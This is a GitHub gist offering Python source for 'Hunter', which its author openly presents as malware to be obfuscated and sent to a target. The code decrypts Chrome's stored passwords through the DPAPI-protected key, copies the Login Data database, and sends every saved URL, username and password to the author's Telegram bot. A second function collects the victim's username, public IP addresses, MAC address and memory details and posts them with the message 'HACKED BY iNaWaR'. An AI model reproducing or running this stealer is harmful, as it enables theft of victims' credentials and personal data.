Skip to content

Instantly share code, notes, and snippets.

@iNawaR1
Last active January 2, 2024 00:07
Show Gist options
  • Save iNawaR1/0320d0664016f9cc19078f530886231b to your computer and use it in GitHub Desktop.
Save iNawaR1/0320d0664016f9cc19078f530886231b to your computer and use it in GitHub Desktop.
Hunter is a malware to get target's pc and network information for example mac address, network IP and others, you also gonna get target's stored Emails and passwords in google chrome. To use it you need to put your telegram ID and Bot Token in the script then you can encrypt the code and send it to the target or use it with your tools..
########################Free-Software#########################
# Please don't use it for illegal things #
# I AM NOT "REASONABLE" FOR ANY WRONG USE!! #
# Made with love by iNaWaR <3 #
##############################################################
import socket,uuid,re,psutil,threading
import os
import json
import base64
import sqlite3
import requests
from requests import post,get
import telebot
import win32crypt
from Crypto.Cipher import AES
import shutil
Your_TOKEN_Bot = "YOUR TELEGRAM BOT TOKEN HERE"
Your_id = "YOUR TELEGRAM ID"
bot = telebot.TeleBot(Your_TOKEN_Bot)
def fetching_encryption_key():
local_computer_directory_path = os.path.join(
os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_computer_directory_path, "r", encoding="utf-8") as f:
local_state_data = f.read()
local_state_data = json.loads(local_state_data)
encryption_key = base64.b64decode(
local_state_data["os_crypt"]["encrypted_key"])
encryption_key = encryption_key[5:]
return win32crypt.CryptUnprotectData(encryption_key, None, None, None, 0)[1]
def password_decryption(password, encryption_key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(encryption_key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return
def login():
key = fetching_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromePasswords.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins "
"order by date_last_used")
for row in cursor.fetchall():
login_page_url = row[1]
user_name = row[2]
decrypted_password = password_decryption(row[3], key)
if user_name or decrypted_password:
tele = (
f'https://api.telegram.org/bot{Your_TOKEN_Bot}/sendMessage?chat_id={Your_id}&text=\n LOGIN URL {login_page_url}\n USER NAME : {user_name}\n PASSWORD : {decrypted_password}')
re = requests.post(tele)
else:
continue
cursor.close()
db.close()
try:
os.remove(filename)
except:
pass
if __name__ == "__main__":
login()
def get_size(bytes, suffix="8"):
JQ = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < 1024:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= JQ
def INFO_PC():
from requests import get
ipv4 = get('https://api.ipify.org').text
ipv6 = get('https://ipify.org/').text
MAC = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
memory1 = psutil.virtual_memory();
memory2 = psutil.swap_memory()
MOMR = f"""
[✓] username : {os.getlogin()}
[✓] NETWORK IPv4 : {ipv4}
[✓] NETWORK IPv6 : {ipv6}
[✓] Device IP address : {socket.gethostbyname(socket.gethostname())}
[✓] mac address : {MAC}
━━━━━━━━━━━━━━
virtual memory :
Total > {get_size(memory1.total)}
available > {get_size(memory1.available)}
used > {get_size(memory1.used)}
percent > {get_size(memory1.percent)}
━━━━━━━━━━━━━━
swap memory :
Total > {get_size(memory2.total)}
free > {get_size(memory2.free)}
used > {get_size(memory2.used)}
percent > {get_size(memory2.percent)}
━━━━━━━━━━━━━━"""
post('https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}\n HACKED BY iNaWaR'.format(Your_TOKEN_Bot, Your_id,MOMR))
()
if __name__ == '__main__':
theards = []
for i in range(1):
trts = threading.Thread(target=INFO_PC())
trts.start()
theards.append(trts)
for trts2 in theards:
trts2.join()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment